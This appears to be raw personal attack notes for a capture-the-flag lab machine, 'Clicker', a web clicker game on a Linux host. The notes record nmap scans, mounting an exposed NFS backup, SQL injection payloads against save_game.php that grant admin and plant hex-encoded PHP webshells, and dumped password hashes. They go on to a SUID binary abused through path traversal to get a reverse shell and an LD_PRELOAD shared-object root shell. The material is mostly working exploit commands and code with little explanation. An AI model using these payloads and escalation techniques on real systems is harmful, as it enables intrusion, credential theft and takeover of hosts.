10.10.11.232

$db_server="localhost";
$db_username="clicker_db_user";
$db_password="clicker_db_password";
$db_name="clicker";


----------------------------------------------------------------------------------------------------------------------------------------

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-11 10:02 +07
Nmap scan report for 10.10.11.232
Host is up (0.066s latency).
Not shown: 65356 closed tcp ports (conn-refused), 170 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 89:d7:39:34:58:a0:ea:a1:db:c1:3d:14:ec:5d:5a:92 (ECDSA)
|_  256 b4:da:8d:af:65:9c:bb:f0:71:d5:13:50:ed:d8:11:30 (ED25519)
80/tcp    open  http     Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://clicker.htb/
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      37186/udp6  mountd
|   100005  1,2,3      37323/tcp6  mountd
|   100005  1,2,3      51167/tcp   mountd
|   100005  1,2,3      54141/udp   mountd
|   100021  1,3,4      33711/tcp6  nlockmgr
|   100021  1,3,4      35121/tcp   nlockmgr
|   100021  1,3,4      36842/udp   nlockmgr
|   100021  1,3,4      54477/udp6  nlockmgr
|   100024  1          36850/udp   status
|   100024  1          42839/udp6  status
|   100024  1          46081/tcp   status
|   100024  1          54389/tcp6  status
|   100227  3           2049/tcp   nfs_acl
|_  100227  3           2049/tcp6  nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
35121/tcp open  nlockmgr 1-4 (RPC #100021)
46081/tcp open  status   1 (RPC #100024)
50207/tcp open  mountd   1-3 (RPC #100005)
51167/tcp open  mountd   1-3 (RPC #100005)
53481/tcp open  mountd   1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.80 secondss



----------------------------------------------------------------------------------------------------------------------------------------


80 - web
	dirsearch -u http://clicker.htb/ -e "*" -r
	wfuzz -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.clicker.htb" --hc 403,400,301,302 -t 50 10.10.11.232

111 - Portmapper ref:https://book.hacktricks.xyz/network-services-pentesting/pentesting-rpcbind
	sudo nmap -sSUC -p111 clicker.htb
	rpcinfo clicker.htb
	nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -p 2049 10.10.11.232
	showmount -e 10.10.11.232
		Export list for 10.10.11.232:
		/mnt/backups *
	sudo mount -t nfs -o vers=3 10.10.11.232:/mnt/backups /mnt/mntclicker -o nolock
	cp clicker.htb_backup.zip /home/kali/stuffs/htb/clicker.htb/
	7z x clicker.htb_backup.zip


- sqli
	if ($_SESSION["ROLE"] != "Admin") {
	  header('Location: /index.php');
	  die;
	}
;ROLE=Admin


save_game.php

if (isset($_SESSION['PLAYER']) && $_SESSION['PLAYER'] != "") {
        $args = [];
        foreach($_GET as $key=>$value) {
                if (strtolower($key) === 'role') {
                        // prevent malicious users to modify role
                        header('Location: /index.php?err=Malicious activity detected!');
                        die;
                }
                $args[$key] = $value;
        }
        save_profile($_SESSION['PLAYER'], $_GET);
        // update session info
        $_SESSION['CLICKS'] = $_GET['clicks'];
        $_SESSION['LEVEL'] = $_GET['level'];
        header('Location: /index.php?msg=Game has been saved!');

}


function save_profile($player, $args) {
        global $pdo;
        $params = ["player"=>$player];
        $setStr = "";
        foreach ($args as $key => $value) {
                $setStr .= $key . "=" . $pdo->quote($value) . ","; #quote
        }
        $setStr = rtrim($setStr, ",");
        $stmt = $pdo->prepare("UPDATE players SET $setStr WHERE username = :player"); # click=1,level=1,role=Admin
        $stmt -> execute($params);
}



click=1&level=1,role=Admin
/save_game.php?clicks=16&level=1,role=Admin
/save_game.php?clicks=999&level%3d999,role=Admin ==> admin
/save_game.php?clicks=16&level=1&;select(sleep(10));#asd=Admin
/save_game.php?clicks=999&level%3d999;select(sleep(10));=Admin 
/save_game.php?clicks=16&level%3d1;select/**/sleep(5);=Admin
/save_game.php?clicks=999&level%3d999;UPDATE/**/players/**/SET/**/nickname%3d0x3c3f3d60245f4745545b305d603f3e;select/**/sleep(5);=Admin ==>> done

UPDATE/**/players/**/SET/**/nickname=0x3c3f3d60245f4745545b305d603f3e
UPDATE/**/players/**/SET/**/nickname%3d0x3c3f3d60245f4745545b305d603f3e ==> try webshell not good one

UPDATE/**/players/**/SET/**/nickname%3d0x3c3f70687020706870696e666f28293b203f3e ==> phpinfo


clicks=16&level%3d1,role%3d'Admin'%3b=Admin 

clicks=16&level%3d1,role=Admin ==> admin role

clicks=16&level=1
clicks=16&level=%3c%3f%3d%60%24%5f%47%45%54%5b%30%5d%60%3f%3e

<?=`$_GET[0]`?>

if (! ctype_alnum($_POST["username"])) { ==>> try bypass

sqlmap --url 'http://localhost:8081/?id=*' -p 'id' -o --level=5  --risk=3 --dbms=MySQL --technique 'TBS' --dump -b --drop-set-cookie --tamper=space2comment.py
sqlmap --url 'http://localhost:8081/?id=*' -p 'id' -o --level=5  --risk=3 --dbms=MySQL --technique 'BS' --dump -D 'Revenue' -T 'cms_Account' --drop-set-cookie



clicks=16,level=1;UPDATE/**/players/**/SET/**/nickname=0x3c3f3d60245f4745545b305d603f3e;select/**/sleep(5);
clicks=16,level=1;UPDATE/**/players/**/SET/**/nickname=0x3c3f3d60245f4745545b305d603f3e;select/**/sleep(5);=Admin
UPDATE players SET clicks=16,level=1;UPDATE/**/players/**/SET/**/nickname=0x3c3f3d60245f4745545b305d603f3e;select/**/sleep(5);=Admin WHERE username = :player;

UPDATE players SET clicks=16,level=1;UPDATE/**/players/**/SET/**/nickname=0x3c3f3d60245f4745545b305d603f3e;select/**/sleep(5);=Admin WHERE username = :player;



phpinfo
0x3c3f70687020706870696e666f28293b203f3e ==> www-data 

webshell
0x3c3f706870206563686f20225368656c6c223b73797374656d28245f4745545b27636d64275d293b203f3e
/save_game.php?clicks=999&level%3d999,nickname%3d0x3c3f706870206563686f20225368656c6c223b73797374656d28245f4745545b27636d64275d293b203f3e,role=Admin

=> export => webshell

| admin         | ec9407f758dbed2ac510cac18f67056de100b1890f5bd8027ee496cc250e3f82 |
| ButtonLover99 | 55d1d58e17361fe78a61a96847b0e0226a0bc1a4e38a7b167c10b5cf513ca81f |
| Paol          | bff439c136463a07dac48e50b31a322a4538d1fac26bfb5fd3c48f57a17dabd3 |
| test          | 9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08 |
| Th3Br0        | 3185684ff9fd84f65a6c3037c3214ff4ebdd0e205b6acea97136d23407940c01 |


ec9407f758dbed2ac510cac18f67056de100b1890f5bd8027ee496cc250e3f82
55d1d58e17361fe78a61a96847b0e0226a0bc1a4e38a7b167c10b5cf513ca81f
bff439c136463a07dac48e50b31a322a4538d1fac26bfb5fd3c48f57a17dabd3
9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08
3185684ff9fd84f65a6c3037c3214ff4ebdd0e205b6acea97136d23407940c01


jack:x:1000:1000:jack:/home/jack:/bin/bash


-rwsrwsr-x 1 jack jack 16368 Feb 26  2023 /opt/manage/execute_query => suid



CVE-2023-2640-CVE-2023-32629 ==> try this

ec9407f758dbed2ac510cac18f67056de100b1890f5bd8027ee496cc250e3f82

BestGameinHistory
Yeah_What_a_Nickname
Brohhhhhhhhhh

/home/jack/queries/create.sql

strace /opt/manage/execute_query 5 '/../../../../../../tsdasdasd.sql'
access("/home/jack/queries//../../../../../../t", R_OK) = -1 EACCES (Permission denied)
access("/home/jack/queries/../../../tmp/p.sql", R_OK)
access("/home/jack/queries/../../../tmp/pqq.sql", R_OK) = -1 EACCES (Permission denied)
/home/jack/queries/../../../tmp/q;./a ==> fail because can't set / in name

/opt/manage/execute_query 5 '../../../tmp/q;./r'

export PATH="/tmp:$PATH"
q ==> query file
q;r ==> queryfile for check access
r ==> reverse shell 


/opt/manage/execute_query 5 '../../../tmp/q;r'

uid=1000(jack) gid=33(www-data) groups=33(www-data)
ssh -i clicker jack@10.10.11.232

----------------------------------------------------------------------------------------------------------------------------------------
ssh -i clicker jack@10.10.11.232

-bash-5.1$ sudo -l
Matching Defaults entries for jack on clicker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User jack may run the following commands on clicker:
    (ALL : ALL) ALL
    (root) SETENV: NOPASSWD: /opt/monitor.sh


nano ld_preload.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
        unsetenv("LD_PRELOAD");
        setresuid(0,0,0);
        system("/bin/bash -p");
}

└─$ gcc -fPIC -shared -nostartfiles -o ./ld_preload.so ./ld_preload.c
./ld_preload.c: In function ‘_init’:
./ld_preload.c:7:9: warning: implicit declaration of function ‘setresuid’ [-Wimplicit-function-declaration]
    7 |         setresuid(0,0,0);
      |         ^~~~~~~~~

ld_preload
sudo LD_PRELOAD=/tmp/ld_preload.so /opt/monitor.sh


“perl_startup” Privilege Escalation
sudo PERL5OPT=-d PERL5DB='exec "whoami"' /opt/monitor.sh

----------------------------------------------------------------------------------------------------------------------------------------
GET /save_game.php?clicks=16&level%3d1;UPDATE/**/players/**/SET/**/nickname%3d0x3c3f3d60245f4745545b305d603f3e;select/**/sleep(5);=Admin ==> local test
username   | nickname        | password       | role  | clicks | level 

INSERT INTO players VALUES ('player1', 0x3c3f70687020706870696e666f28293b203f3e, 'password', 'user', '999', '999');

ls -al /usr/local/sbin | grep timestamp
ls -al /usr/local/bin | grep timestamp
ls -al /usr/sbin | grep timestamp
ls -al /usr/bin | grep timestamp
ls -al /sbin | grep timestamp
ls -al /bin | grep timestamp
ls -al /usr/games | grep timestamp
ls -al /usr/local/games | grep timestamp
ls -al /snap/bin | grep timestamp


$NOSAVE =>> try inject this
"$EUID" =>> try this but after ==> read only variable




----------------------------------------------------------------------------------------------------------------------------------------

<?php
session_start();

$args = [];
foreach($_GET as $key=>$value) {
        if (strtolower($key) === 'role') {
                // prevent malicious users to modify role
                header('Location: /index.php?err=Malicious activity detected!');
                die;
        }
        $args[$key] = $value;
}
//save_profile($_SESSION['PLAYER'], $_GET);
$setStr = "";
foreach ($args as $key => $value) {
        $setStr .= $key . "=" . $pdo->quote($value) . ","; #quote
}
$setStr = rtrim($setStr, ",");
echo $setStr;

// update session info
$_SESSION['CLICKS'] = $_GET['clicks'];
$_SESSION['LEVEL'] = $_GET['level'];
header('Location: /index.php?msg=Game has been saved!');
        

?>



CREATE TABLE players (username varchar(255),nickname varchar(255),password varchar(255),role varchar(255),clicks varchar(255),level varchar(255));


UPDATE players SET ContactName='Juan'; 




